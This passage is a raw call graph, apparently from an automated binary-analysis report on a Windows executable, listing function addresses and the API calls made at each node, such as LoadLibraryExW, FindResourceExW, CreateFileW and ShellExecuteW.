LeaveCriticalSection 94545->94546 94547 7ff75f14376e 94546->94547 94548 7ff75f169334 94547->94548 94549 7ff75f16933d 94548->94549 94550 7ff75f143778 94548->94550 94602 7ff75f1755d4 15 API calls abort 94549->94602 94554 7ff75f1436e8 SystemParametersInfoW SystemParametersInfoW 94550->94554 94552 7ff75f169342 94603 7ff75f17b164 31 API calls _invalid_parameter_noinfo 94552->94603 94554->94217 94556 7ff75f1437cd wcsftime 94555->94556 94557 7ff75f149640 4 API calls 94556->94557 94558 7ff75f1437dd GetCurrentDirectoryW 94557->94558 94604 7ff75f1457a0 94558->94604 94560 7ff75f143807 IsDebuggerPresent 94561 7ff75f18b872 MessageBoxA 94560->94561 94562 7ff75f143815 94560->94562 94563 7ff75f18b894 94561->94563 94562->94563 94564 7ff75f143839 94562->94564 94714 7ff75f14e278 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94563->94714 94678 7ff75f143f04 94564->94678 94568 7ff75f143860 GetFullPathNameW 94569 7ff75f147cf4 4 API calls 94568->94569 94570 7ff75f1438a6 94569->94570 94694 7ff75f143f9c 94570->94694 94571 7ff75f1438bf 94573 7ff75f18b8dc SetCurrentDirectoryW 94571->94573 94574 7ff75f1438c7 94571->94574 94573->94574 94575 7ff75f1438d0 94574->94575 94715 7ff75f1ad540 AllocateAndInitializeSid CheckTokenMembership FreeSid 94574->94715 94710 7ff75f143b84 7 API calls 94575->94710 94578 7ff75f18b8f8 94578->94575 94581 7ff75f18b90c 94578->94581 94583 7ff75f145680 6 API calls 94581->94583 94582 7ff75f1438da 94585 7ff75f146258 46 API calls 94582->94585 94587 7ff75f1438ef 94582->94587 94584 7ff75f18b916 94583->94584 94586 7ff75f14ec00 4 API calls 94584->94586 94585->94587 94588 7ff75f18b927 94586->94588 94589 7ff75f143913 94587->94589 94592 7ff75f145d88 Shell_NotifyIconW 94587->94592 94590 7ff75f18b930 94588->94590 94591 7ff75f18b94d 94588->94591 94593 7ff75f14391f SetCurrentDirectoryW 94589->94593 94594 7ff75f1471f8 4 API calls 94590->94594 94596 7ff75f1471f8 4 API calls 94591->94596 94592->94589 94595 7ff75f143934 Concurrency::wait 94593->94595 94597 7ff75f18b93c 94594->94597 94595->94219 94598 7ff75f18b963 GetForegroundWindow ShellExecuteW 94596->94598 94716 7ff75f147c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 94597->94716 94600 7ff75f18b99f Concurrency::wait 94598->94600 94600->94589 94602->94552 94603->94550 94605 7ff75f149640 4 API calls 94604->94605 94606 7ff75f1457d7 94605->94606 94717 7ff75f149bbc 94606->94717 94608 7ff75f1457fe 94609 7ff75f145680 6 API calls 94608->94609 94610 7ff75f145812 94609->94610 94611 7ff75f14ec00 4 API calls 94610->94611 94612 7ff75f145823 94611->94612 94731 7ff75f146460 94612->94731 94615 7ff75f14584e Concurrency::wait 94620 7ff75f14e0a8 4 API calls 94615->94620 94616 7ff75f18c05e 94804 7ff75f1c2948 94616->94804 94618 7ff75f18c074 94619 7ff75f18c081 94618->94619 94621 7ff75f14652c 63 API calls 94618->94621 94822 7ff75f14652c 94619->94822 94622 7ff75f14586a 94620->94622 94621->94619 94624 7ff75f14ec00 4 API calls 94622->94624 94625 7ff75f145888 94624->94625 94629 7ff75f18c099 94625->94629 94757 7ff75f14eff8 94625->94757 94627 7ff75f1458ad Concurrency::wait 94628 7ff75f14ec00 4 API calls 94627->94628 94630 7ff75f1458d7 94628->94630 94632 7ff75f145ab4 4 API calls 94629->94632 94630->94629 94631 7ff75f14eff8 46 API calls 94630->94631 94634 7ff75f1458fc Concurrency::wait 94631->94634 94633 7ff75f18c0e1 94632->94633 94635 7ff75f145ab4 4 API calls 94633->94635 94637 7ff75f149640 4 API calls 94634->94637 94636 7ff75f18c103 94635->94636 94640 7ff75f145680 6 API calls 94636->94640 94638 7ff75f14591f 94637->94638 94770 7ff75f145ab4 94638->94770 94643 7ff75f18c12b 94640->94643 94645 7ff75f145ab4 4 API calls 94643->94645 94644 7ff75f145941 94644->94629 94647 7ff75f145949 94644->94647 94646 7ff75f18c139 94645->94646 94648 7ff75f14e0a8 4 API calls 94646->94648 94649 7ff75f168e28 wcsftime 37 API calls 94647->94649 94650 7ff75f18c14a 94648->94650 94651 7ff75f145958 94649->94651 94652 7ff75f145ab4 4 API calls 94650->94652 94651->94633 94653 7ff75f145960 94651->94653 94654 7ff75f18c15b 94652->94654 94655 7ff75f168e28 wcsftime 37 API calls 94653->94655 94658 7ff75f14e0a8 4 API calls 94654->94658 94656 7ff75f14596f 94655->94656 94656->94636 94657 7ff75f145977 94656->94657 94659 7ff75f168e28 wcsftime 37 API calls 94657->94659 94660 7ff75f18c172 94658->94660 94661 7ff75f145986 94659->94661 94662 7ff75f145ab4 4 API calls 94660->94662 94663 7ff75f1459c6 94661->94663 94666 7ff75f145ab4 4 API calls 94661->94666 94665 7ff75f18c183 94662->94665 94663->94654 94664 7ff75f1459d3 94663->94664 94793 7ff75f14df90 94664->94793 94667 7ff75f1459a8 94666->94667 94668 7ff75f14e0a8 4 API calls 94667->94668 94670 7ff75f1459b5 94668->94670 94671 7ff75f145ab4 4 API calls 94670->94671 94671->94663 94674 7ff75f14d670 5 API calls 94675 7ff75f145a12 94674->94675 94675->94674 94676 7ff75f145ab4 4 API calls 94675->94676 94677 7ff75f145a60 Concurrency::wait 94675->94677 94676->94675 94677->94560 94679 7ff75f143f29 wcsftime 94678->94679 94680 7ff75f143f4b 94679->94680 94681 7ff75f18ba2c memcpy_s 94679->94681 94682 7ff75f1456d4 5 API calls 94680->94682 94684 7ff75f18ba4d GetOpenFileNameW 94681->94684 94683 7ff75f143f56 94682->94683 95166 7ff75f143eb4 94683->95166 94685 7ff75f18bab0 94684->94685 94686 7ff75f143858 94684->94686 94688 7ff75f147cf4 4 API calls 94685->94688 94686->94568 94686->94571 94690 7ff75f18babc 94688->94690 94692 7ff75f143f6c 95184 7ff75f146394 94692->95184 94695 7ff75f143fb6 wcsftime 94694->94695 95227 7ff75f149734 94695->95227 94697 7ff75f143fc4 94698 7ff75f144050 94697->94698 95237 7ff75f144d28 77 API calls 94697->95237 94698->94571 94700 7ff75f143fd3 94700->94698 95238 7ff75f144b0c 79 API calls Concurrency::wait 94700->95238 94702 7ff75f143fe0 94702->94698 94703 7ff75f143fe8 GetFullPathNameW 94702->94703 94704 7ff75f147cf4 4 API calls 94703->94704 94705 7ff75f144014 94704->94705 94706 7ff75f147cf4 4 API calls 94705->94706 94707 7ff75f144028 94706->94707 94708 7ff75f18bac2 wcscat 94707->94708 94709 7ff75f147cf4 4 API calls 94707->94709 94709->94698 95242 7ff75f143d90 7 API calls 94710->95242 94712 7ff75f1438d5 94713 7ff75f143cbc CreateWindowExW CreateWindowExW ShowWindow ShowWindow 94712->94713 94714->94571 94715->94578 94716->94591 94718 7ff75f149be5 wcsftime 94717->94718 94719 7ff75f147cf4 4 API calls 94718->94719 94720 7ff75f149c1b 94718->94720 94719->94720 94722 7ff75f149c4a Concurrency::wait 94720->94722 94828 7ff75f149d84 94720->94828 94723 7ff75f149d21 94722->94723 94727 7ff75f14ec00 4 API calls 94722->94727 94729 7ff75f144680 4 API calls 94722->94729 94730 7ff75f149d84 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94722->94730 94724 7ff75f149d57 Concurrency::wait 94723->94724 94725 7ff75f14ec00 4 API calls 94723->94725 94724->94608 94726 7ff75f149d4a 94725->94726 94728 7ff75f144680 4 API calls 94726->94728 94727->94722 94728->94724 94729->94722 94730->94722 94831 7ff75f146d64 94731->94831 94734 7ff75f146d64 2 API calls 94737 7ff75f14649d 94734->94737 94735 7ff75f1464ba FreeLibrary 94736 7ff75f1464c0 94735->94736 94835 7ff75f1748e0 94736->94835 94737->94735 94737->94736 94740 7ff75f18c8f6 94742 7ff75f14652c 63 API calls 94740->94742 94741 7ff75f1464db LoadLibraryExW 94854 7ff75f146cc4 94741->94854 94744 7ff75f18c8fe 94742->94744 94747 7ff75f146cc4 3 API calls 94744->94747 94749 7ff75f18c907 94747->94749 94748 7ff75f146505 94748->94749 94750 7ff75f146512 94748->94750 94876 7ff75f1467d8 94749->94876 94751 7ff75f14652c 63 API calls 94750->94751 94753 7ff75f145846 94751->94753 94753->94615 94753->94616 94756 7ff75f18c93f 95079 7ff75f151a30 94757->95079 94759 7ff75f14f029 94760 7ff75f19a7a8 94759->94760 94761 7ff75f14f040 94759->94761 95095 7ff75f14ee20 5 API calls Concurrency::wait 94760->95095 94764 7ff75f164c68 4 API calls 94761->94764 94763 7ff75f19a7bc 94765 7ff75f14f066 94764->94765 94767 7ff75f14f08f 94765->94767 95094 7ff75f14f0ec RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94765->95094 95090 7ff75f14f1bc 94767->95090 94769 7ff75f14f0c6 94769->94627 94771 7ff75f145ac6 94770->94771 94772 7ff75f145ae4 94770->94772 94773 7ff75f14e0a8 4 API calls 94771->94773 94774 7ff75f147cf4 4 API calls 94772->94774 94775 7ff75f14592d 94773->94775 94774->94775 94776 7ff75f168e28 94775->94776 94777 7ff75f168ea4 94776->94777 94778 7ff75f168e3f 94776->94778 95099 7ff75f168d98 35 API calls 2 library calls 94777->95099 94785 7ff75f168e63 94778->94785 95097 7ff75f1755d4 15 API calls abort 94778->95097 94781 7ff75f168ed6 94783 7ff75f168ee2 94781->94783 94790 7ff75f168ef9 94781->94790 94782 7ff75f168e49 95098 7ff75f17b164 31 API calls _invalid_parameter_noinfo 94782->95098 95100 7ff75f1755d4 15 API calls abort 94783->95100 94785->94644 94787 7ff75f168e54 94787->94644 94788 7ff75f168ee7 95101 7ff75f17b164 31 API calls _invalid_parameter_noinfo 94788->95101 94791 7ff75f168ef2 94790->94791 94792 7ff75f172c80 37 API calls wcsftime 94790->94792 94791->94644 94792->94790 94794 7ff75f14dfac 94793->94794 94795 7ff75f164c68 4 API calls 94794->94795 94796 7ff75f1459f5 94794->94796 94795->94796 94797 7ff75f14d670 94796->94797 94798 7ff75f14d698 94797->94798 94802 7ff75f14d6a2 94798->94802 95102 7ff75f14880c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94798->95102 94801 7ff75f199d43 94803 7ff75f14d7de 94802->94803 95103 7ff75f14ee20 5 API calls Concurrency::wait 94802->95103 94803->94675 94805 7ff75f1c29c8 94804->94805 95104 7ff75f1c2b70 94805->95104 94808 7ff75f1467d8 45 API calls 94809 7ff75f1c2a03 94808->94809 94810 7ff75f1467d8 45 API calls 94809->94810 94811 7ff75f1c2a23 94810->94811 94812 7ff75f1467d8 45 API calls 94811->94812 94813 7ff75f1c2a49 94812->94813 94814 7ff75f1467d8 45 API calls 94813->94814 94815 7ff75f1c2a6d 94814->94815 94816 7ff75f1467d8 45 API calls 94815->94816 94817 7ff75f1c2ac5 94816->94817 94818 7ff75f1c240c 32 API calls 94817->94818 94819 7ff75f1c2ada 94818->94819 94821 7ff75f1c29de 94819->94821 95109 7ff75f1c1d48 94819->95109 94821->94618 94823 7ff75f14653d 94822->94823 94824 7ff75f146542 94822->94824 94825 7ff75f174970 62 API calls 94823->94825 94826 7ff75f146558 94824->94826 94827 7ff75f14656f FreeLibrary 94824->94827 94825->94824 94826->94629 94827->94826 94829 7ff75f14a7c0 4 API calls 94828->94829 94830 7ff75f149d99 94829->94830 94830->94720 94832 7ff75f146490 94831->94832 94833 7ff75f146d74 LoadLibraryA 94831->94833 94832->94734 94832->94737 94833->94832 94834 7ff75f146d89 GetProcAddress 94833->94834 94834->94832 94836 7ff75f1747fc 94835->94836 94837 7ff75f17482a 94836->94837 94839 7ff75f17485c 94836->94839 94896 7ff75f1755d4 15 API calls abort 94837->94896 94842 7ff75f174862 94839->94842 94843 7ff75f17486f 94839->94843 94840 7ff75f17482f 94897 7ff75f17b164 31 API calls _invalid_parameter_noinfo 94840->94897 94898 7ff75f1755d4 15 API calls abort 94842->94898 94884 7ff75f17feb4 94843->94884 94846 7ff75f1464cf 94846->94740 94846->94741 94848 7ff75f174883 94899 7ff75f1755d4 15 API calls abort 94848->94899 94849 7ff75f174890 94891 7ff75f180304 94849->94891 94852 7ff75f1748a3 94900 7ff75f16df60 LeaveCriticalSection 94852->94900 95038 7ff75f146d1c 94854->95038 94857 7ff75f146cf1 94859 7ff75f146d0f FreeLibrary 94857->94859 94860 7ff75f1464f7 94857->94860 94858 7ff75f146d1c 2 API calls 94858->94857 94859->94860 94861 7ff75f146580 94860->94861 94862 7ff75f164c68 4 API calls 94861->94862 94863 7ff75f1465b5 memcpy_s 94862->94863 94864 7ff75f18c9f5 94863->94864 94865 7ff75f146740 CreateStreamOnHGlobal 94863->94865 94868 7ff75f146602 94863->94868 95042 7ff75f1c2e00 45 API calls 94864->95042 94866 7ff75f146759 FindResourceExW 94865->94866 94865->94868 94866->94868 94869 7ff75f18c97e LoadResource 94868->94869 94871 7ff75f1467d8 45 API calls 94868->94871 94873 7ff75f18c9fd 94868->94873 94875 7ff75f1466e8 94868->94875 94869->94868 94870 7ff75f18c997 SizeofResource 94869->94870 94870->94868 94872 7ff75f18c9ae LockResource 94870->94872 94871->94868 94872->94868 94874 7ff75f1467d8 45 API calls 94873->94874 94874->94875 94875->94748 94877 7ff75f1467f7 94876->94877 94878 7ff75f18ca6c 94876->94878 95043 7ff75f174c5c 94877->95043 94881 7ff75f1c240c 95062 7ff75f1c2200 94881->95062 94883 7ff75f1c2430 94883->94756 94901 7ff75f17b9bc EnterCriticalSection 94884->94901 94886 7ff75f17fecb 94887 7ff75f17ff54 18 API calls 94886->94887 94888 7ff75f17fed6 94887->94888 94889 7ff75f17ba10 _isindst LeaveCriticalSection 94888->94889 94890 7ff75f174879 94889->94890 94890->94848 94890->94849 94902 7ff75f180040 94891->94902 94894 7ff75f18035e 94894->94852 94896->94840 94897->94846 94898->94846 94899->94846 94903 7ff75f18007d try_get_function 94902->94903 94903->94903 94913 7ff75f180211 94903->94913 94917 7ff75f16db68 37 API calls 4 library calls 94903->94917 94905 7ff75f1802de 94921 7ff75f17b164 31 API calls _invalid_parameter_noinfo 94905->94921 94907 7ff75f18021a 94907->94894 94914 7ff75f187738 94907->94914 94909 7ff75f180277 94909->94913 94918 7ff75f16db68 37 API calls 4 library calls 94909->94918 94911 7ff75f18029a 94911->94913 94919 7ff75f16db68 37 API calls 4 library calls 94911->94919 94913->94907 94920 7ff75f1755d4 15 API calls abort 94913->94920 94922 7ff75f186d04 94914->94922 94917->94909 94918->94911 94919->94913 94920->94905 94921->94907 94923 7ff75f186d28 94922->94923 94924 7ff75f186d40 94922->94924 94976 7ff75f1755d4 15 API calls abort 94923->94976 94924->94923 94927 7ff75f186d6d 94924->94927 94926 7ff75f186d2d 94977 7ff75f17b164 31 API calls _invalid_parameter_noinfo 94926->94977 94933 7ff75f187348 94927->94933 94931 7ff75f186d39 94931->94894 94979 7ff75f187078 94933->94979 94936 7ff75f1873bc 95011 7ff75f1755b4 15 API calls abort 94936->95011 94937 7ff75f1873d3 94999 7ff75f17e418 94937->94999 94940 7ff75f1873c1 95012 7ff75f1755d4 15 API calls abort 94940->95012 94942 7ff75f1873f7 CreateFileW 94946 7ff75f1874eb GetFileType 94942->94946 94947 7ff75f187469 94942->94947 94943 7ff75f1873df 95013 7ff75f1755b4 15 API calls abort 94943->95013 94949 7ff75f187549 94946->94949 94950 7ff75f1874f8 GetLastError 94946->94950 94952 7ff75f1874b8 GetLastError 94947->94952 94956 7ff75f187478 CreateFileW 94947->94956 94948 7ff75f186d95 94948->94931 94978 7ff75f17e3f4 LeaveCriticalSection 94948->94978 95018 7ff75f17e334 16 API calls 2 library calls 94949->95018 95016 7ff75f175564 15 API calls 2 library calls 94950->95016 94951 7ff75f1873e4 95014 7ff75f1755d4 15 API calls abort 94951->95014 95015 7ff75f175564 15 API calls 2 library calls 94952->95015 94956->94946 94956->94952 94957 7ff75f187507 CloseHandle 94957->94940 94958 7ff75f187539 94957->94958 95017 7ff75f1755d4 15 API calls abort 94958->95017 94960 7ff75f187568 94962 7ff75f1875b5 94960->94962 95019 7ff75f187284 67 API calls 2 library calls 94960->95019 94967 7ff75f1875ec 94962->94967 95020 7ff75f186de4 67 API calls 4 library calls 94962->95020 94963 7ff75f18753e 94963->94940 94966 7ff75f1875e8 94966->94967 94968 7ff75f1875fe 94966->94968 95021 7ff75f1804b8 94967->95021 94968->94948 94970 7ff75f187681 CloseHandle CreateFileW 94968->94970 94971 7ff75f1876f9 94970->94971 94972 7ff75f1876cb GetLastError 94970->94972 94971->94948 95036 7ff75f175564 15 API calls 2 library calls 94972->95036 94974 7ff75f1876d8 95037 7ff75f17e548 16 API calls 2 library calls 94974->95037 94976->94926 94977->94931 94980 7ff75f1870a4 94979->94980 94987 7ff75f1870be 94979->94987 94981 7ff75f1755d4 memcpy_s 15 API calls 94980->94981 94980->94987 94982 7ff75f1870b3 94981->94982 94983 7ff75f17b164 _invalid_parameter_noinfo 31 API calls 94982->94983 94983->94987 94984 7ff75f18718c 94986 7ff75f172554 31 API calls 94984->94986 94997 7ff75f1871ec 94984->94997 94985 7ff75f18713b 94985->94984 94988 7ff75f1755d4 memcpy_s 15 API calls 94985->94988 94989 7ff75f1871e8 94986->94989 94987->94985 94990 7ff75f1755d4 memcpy_s 15 API calls 94987->94990 94991 7ff75f187181 94988->94991 94992 7ff75f18726b 94989->94992 94989->94997 94993 7ff75f187130 94990->94993 94994 7ff75f17b164 _invalid_parameter_noinfo 31 API calls 94991->94994 94995 7ff75f17b184 _invalid_parameter_noinfo 16 API calls 94992->94995 94996 7ff75f17b164 _invalid_parameter_noinfo 31 API calls 94993->94996 94994->94984 94998 7ff75f187280 94995->94998 94996->94985 94997->94936 94997->94937 95000 7ff75f17b9bc _isindst EnterCriticalSection 94999->95000 95007 7ff75f17e43b 95000->95007 95001 7ff75f17e487 95003 7ff75f17ba10 _isindst LeaveCriticalSection 95001->95003 95002 7ff75f17e464 95004 7ff75f17e170 16 API calls 95002->95004 95005 7ff75f17e52a 95003->95005 95006 7ff75f17e469 95004->95006 95005->94942 95005->94943 95006->95001 95010 7ff75f17e310 wprintf EnterCriticalSection 95006->95010 95007->95001 95007->95002 95008 7ff75f17e4c2 EnterCriticalSection 95007->95008 95008->95001 95009 7ff75f17e4d1 LeaveCriticalSection 95008->95009 95009->95007 95010->95001 95011->94940 95012->94948 95013->94951 95014->94940 95015->94940 95016->94957 95017->94963 95018->94960 95019->94962 95020->94966 95022 7ff75f17e604 31 API calls 95021->95022 95023 7ff75f1804cc 95022->95023 95024 7ff75f1804d2 95023->95024 95025 7ff75f18050c 95023->95025 95027 7ff75f17e604 31 API calls 95023->95027 95026 7ff75f17e548 16 API calls 95024->95026 95025->95024 95028 7ff75f17e604 31 API calls 95025->95028 95029 7ff75f180534 95026->95029 95030 7ff75f1804ff 95027->95030 95031 7ff75f180518 CloseHandle 95028->95031 95032 7ff75f180560 95029->95032 95035 7ff75f175564 fread_s 15 API calls 95029->95035 95033 7ff75f17e604 31 API calls 95030->95033 95031->95024 95034 7ff75f180525 GetLastError 95031->95034 95032->94948 95033->95025 95034->95024 95035->95032 95036->94974 95037->94971 95039 7ff75f146d2c LoadLibraryA 95038->95039 95040 7ff75f146ce3 95038->95040 95039->95040 95041 7ff75f146d41 GetProcAddress 95039->95041 95040->94857 95040->94858 95041->95040 95042->94873 95046 7ff75f174c7c 95043->95046 95047 7ff75f174ca6 95046->95047 95058 7ff75f14680a 95046->95058 95048 7ff75f174cd7 95047->95048 95050 7ff75f174cb5 memcpy_s 95047->95050 95047->95058 95061 7ff75f16df54 EnterCriticalSection 95048->95061 95059 7ff75f1755d4 15 API calls abort 95050->95059 95054 7ff75f174cca 95060 7ff75f17b164 31 API calls _invalid_parameter_noinfo 95054->95060 95058->94881 95059->95054 95060->95058 95065 7ff75f1747bc 95062->95065 95064 7ff75f1c2210 95064->94883 95068 7ff75f174724 95065->95068 95069 7ff75f174732 95068->95069 95071 7ff75f174746 95068->95071 95076 7ff75f1755d4 15 API calls abort 95069->95076 95072 7ff75f174742 95071->95072 95078 7ff75f17bef8 6 API calls __vcrt_uninitialize_ptd 95071->95078 95072->95064 95073 7ff75f174737 95077 7ff75f17b164 31 API calls _invalid_parameter_noinfo 95073->95077 95076->95073 95077->95072 95078->95072 95080 7ff75f151a48 95079->95080 95081 7ff75f151c5f 95079->95081 95089 7ff75f151a90 95080->95089 95096 7ff75f165114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95080->95096 95081->94759 95089->94759 95091 7ff75f14f1ce 95090->95091 95093 7ff75f14f1d8 95090->95093 95092 7ff75f151a30 45 API calls 95091->95092 95092->95093 95093->94769 95094->94767 95095->94763 95097->94782 95098->94787 95099->94781 95100->94788 95101->94791 95102->94802 95103->94801 95108 7ff75f1c2bae 95104->95108 95105 7ff75f1c240c 32 API calls 95105->95108 95106 7ff75f1c29da 95106->94808 95106->94821 95107 7ff75f1467d8 45 API calls 95107->95108 95108->95105 95108->95106 95108->95107 95110 7ff75f1c1d71 95109->95110 95111 7ff75f1c1d61 95109->95111 95113 7ff75f1c1dbf 95110->95113 95114 7ff75f1748e0 89 API calls 95110->95114 95123 7ff75f1c1d7a 95110->95123 95112 7ff75f1748e0 89 API calls 95111->95112 95112->95110 95136 7ff75f1c2038 95113->95136 95116 7ff75f1c1d9e 95114->95116 95116->95113 95118 7ff75f1c1da7 95116->95118 95117 7ff75f1c1df5 95119 7ff75f1c1df9 95117->95119 95124 7ff75f1c1e1c 95117->95124 95118->95123 95148 7ff75f174970 95118->95148 95121 7ff75f174970 62 API calls 95119->95121 95122 7ff75f1c1e07 95119->95122 95121->95122 95122->95123 95125 7ff75f174970 62 API calls 95122->95125 95123->94821 95126 7ff75f1c1e4a 95124->95126 95127 7ff75f1c1e2a 95124->95127 95125->95123 95140 7ff75f1c1e88 95126->95140 95129 7ff75f1c1e38 95127->95129 95130 7ff75f174970 62 API calls 95127->95130 95129->95123 95131 7ff75f174970 62 API calls 95129->95131 95130->95129 95131->95123 95132 7ff75f1c1e52 95133 7ff75f1c1e68 95132->95133 95134 7ff75f174970 62 API calls 95132->95134 95133->95123 95135 7ff75f174970 62 API calls 95133->95135 95134->95133 95135->95123 95137 7ff75f1c2069 95136->95137 95139 7ff75f1c2056 memcpy_s 95136->95139 95138 7ff75f174c5c _fread_nolock 45 API calls 95137->95138 95138->95139 95139->95117 95141 7ff75f1c1fb0 95140->95141 95147 7ff75f1c1eaa 95140->95147 95142 7ff75f1c1fd3 95141->95142 95162 7ff75f172a04 60 API calls 2 library calls 95141->95162 95142->95132 95144 7ff75f1c1bd0 45 API calls 95144->95147 95147->95141 95147->95142 95147->95144 95160 7ff75f1c1c9c 45 API calls 95147->95160 95161 7ff75f1c20cc 60 API calls 95147->95161 95149 7ff75f17498e 95148->95149 95150 7ff75f1749a3 95148->95150 95164 7ff75f1755d4 15 API calls abort 95149->95164 95152 7ff75f17499e 95150->95152 95163 7ff75f16df54 EnterCriticalSection 95150->95163 95152->95123 95153 7ff75f174993 95165 7ff75f17b164 31 API calls _invalid_parameter_noinfo 95153->95165 95156 7ff75f1749b9 95157 7ff75f1748ec 60 API calls 95156->95157 95158 7ff75f1749c2 95157->95158 95159 7ff75f16df60 fflush LeaveCriticalSection 95158->95159 95159->95152 95160->95147 95161->95147 95162->95142 95164->95153 95165->95152 95167 7ff75f188f90 wcsftime 95166->95167 95168 7ff75f143ec4 GetLongPathNameW 95167->95168 95169 7ff75f147cf4 4 API calls 95168->95169 95170 7ff75f143eed 95169->95170 95171 7ff75f144074 95170->95171 95172 7ff75f149640 4 API calls 95171->95172 95173 7ff75f14408e 95172->95173 95174 7ff75f1456d4 5 API calls 95173->95174 95175 7ff75f14409b 95174->95175 95176 7ff75f1440a7 95175->95176 95177 7ff75f18bada 95175->95177 95179 7ff75f144680 4 API calls 95176->95179 95182 7ff75f18bb0f 95177->95182 95218 7ff75f161ad0 CompareStringW 95177->95218 95180 7ff75f1440b5 95179->95180 95214 7ff75f1440e8 95180->95214 95183 7ff75f1440cb Concurrency::wait 95183->94692 95185 7ff75f146460 105 API calls 95184->95185 95186 7ff75f1463e5 95185->95186 95187 7ff75f18c656 95186->95187 95188 7ff75f146460 105 API calls 95186->95188 95189 7ff75f1c2948 90 API calls 95187->95189 95190 7ff75f146400 95188->95190 95191 7ff75f18c66e 95189->95191 95190->95187 95192 7ff75f146408 95190->95192 95193 7ff75f18c690 95191->95193 95194 7ff75f18c672 95191->95194 95196 7ff75f18c67b 95192->95196 95197 7ff75f146414 95192->95197 95195 7ff75f164c68 4 API calls 95193->95195 95198 7ff75f14652c 63 API calls 95194->95198 95213 7ff75f18c6dd Concurrency::wait 95195->95213 95220 7ff75f1bc5c8 77 API calls wprintf 95196->95220 95219 7ff75f14e774 143 API calls Concurrency::wait 95197->95219 95198->95196 95201 7ff75f146438 95201->94686 95202 7ff75f18c68a 95202->95193 95203 7ff75f18c895 95204 7ff75f14652c 63 API calls 95203->95204 95212 7ff75f18c8a9 95204->95212 95209 7ff75f14ec00 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95209->95213 95212->95203 95226 7ff75f1b76d8 77 API calls 3 library calls 95212->95226 95213->95203 95213->95209 95213->95212 95221 7ff75f1b7400 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95213->95221 95222 7ff75f1b730c 39 API calls 95213->95222 95223 7ff75f1c0210 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95213->95223 95224 7ff75f14b26c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95213->95224 95225 7ff75f149940 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95213->95225 95215 7ff75f144107 95214->95215 95217 7ff75f144130 memcpy_s 95214->95217 95216 7ff75f164c68 4 API calls 95215->95216 95216->95217 95217->95183 95218->95177 95219->95201 95220->95202 95221->95213 95222->95213 95223->95213 95224->95213 95225->95213 95226->95212 95228 7ff75f14988d 95227->95228 95229 7ff75f149762 95227->95229 95228->94697 95229->95228 95230 7ff75f164c68 4 API calls 95229->95230 95232 7ff75f149791 95230->95232 95231 7ff75f164c68 4 API calls 95236 7ff75f14981c 95231->95236 95232->95231 95236->95228 95239 7ff75f14abe0 81 API calls 2 library calls 95236->95239 95240 7ff75f149940 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95236->95240 95241 7ff75f14b26c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95236->95241 95237->94700 95238->94702 95239->95236 95240->95236 95241->95236 95242->94712 95243 7ff75f19e263 95244 7ff75f19e271 95243->95244 95254 7ff75f152680 95243->95254 95244->95244 95245 7ff75f1529c8 PeekMessageW 95245->95254 95246 7ff75f1526da GetInputState 95246->95245 95246->95254 95248 7ff75f19d181 TranslateAcceleratorW 95248->95254 95249 7ff75f152a33 PeekMessageW 95249->95254 95250 7ff75f152a1f TranslateMessage DispatchMessageW 95250->95249 95251 7ff75f1528b9 timeGetTime 95251->95254 95252 7ff75f19d2bb timeGetTime 95310 7ff75f162ac0 CharUpperBuffW RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95252->95310 95254->95245 95254->95246 95254->95248 95254->95249 95254->95250 95254->95251 95254->95252 95259 7ff75f152856 95254->95259 95260 7ff75f153c20 300 API calls 95254->95260 95261 7ff75f1c34e4 77 API calls 95254->95261 95263 7ff75f152b70 95254->95263 95270 7ff75f1566c0 95254->95270 95304 7ff75f162de8 95254->95304 95309 7ff75f152e30 300 API calls 2 library calls 95254->95309 95311 7ff75f1c3a28 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95254->95311 95312 7ff75f1da320 300 API calls Concurrency::wait 95254->95312 95260->95254 95261->95254 95264 7ff75f152ba9 95263->95264 95265 7ff75f152b96 95263->95265 95333 7ff75f1c34e4 77 API calls 3 library calls 95264->95333 95313 7ff75f152050 95265->95313 95267 7ff75f152b9e 95267->95254 95269 7ff75f19e55c 95295 7ff75f15673b memcpy_s Concurrency::wait 95270->95295 95271 7ff75f1a1fac 95274 7ff75f1a1fbe 95271->95274 95463 7ff75f1dab30 300 API calls Concurrency::wait 95271->95463 95273 7ff75f156d40 9 API calls 95273->95295 95274->95254 95276 7ff75f14ec00 4 API calls 95276->95295 95277 7ff75f156c0f 95278 7ff75f1a1fc9 95277->95278 95279 7ff75f156c3d 95277->95279 95464 7ff75f1c34e4 77 API calls 3 library calls 95278->95464 95460 7ff75f14ee20 5 API calls Concurrency::wait 95279->95460 95283 7ff75f156c4a 95461 7ff75f161fcc 300 API calls 95283->95461 95286 7ff75f164c68 4 API calls 95286->95295 95287 7ff75f1a20c1 95296 7ff75f156b15 95287->95296 95467 7ff75f1c34e4 77 API calls 3 library calls 95287->95467 95288 7ff75f156c78 95462 7ff75f15e8f4 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95288->95462 95291 7ff75f153c20 300 API calls 95291->95295 95292 7ff75f1a2032 95465 7ff75f1c34e4 77 API calls 3 library calls 95292->95465 95294 7ff75f14e0a8 4 API calls 95294->95295 95295->95271 95295->95273 95295->95276 95295->95277 95295->95278 95295->95283 95295->95286 95295->95287 95295->95288 95295->95291 95295->95292 95295->95294 95295->95296 95339 7ff75f1c5b80 95295->95339 95345 7ff75f1c8ea0 95295->95345 95378 7ff75f1c7e48 95295->95378 95412 7ff75f1df0ac 95295->95412 95415 7ff75f1df160 95295->95415 95420 7ff75f1c63dc 95295->95420 95425 7ff75f1c8e98 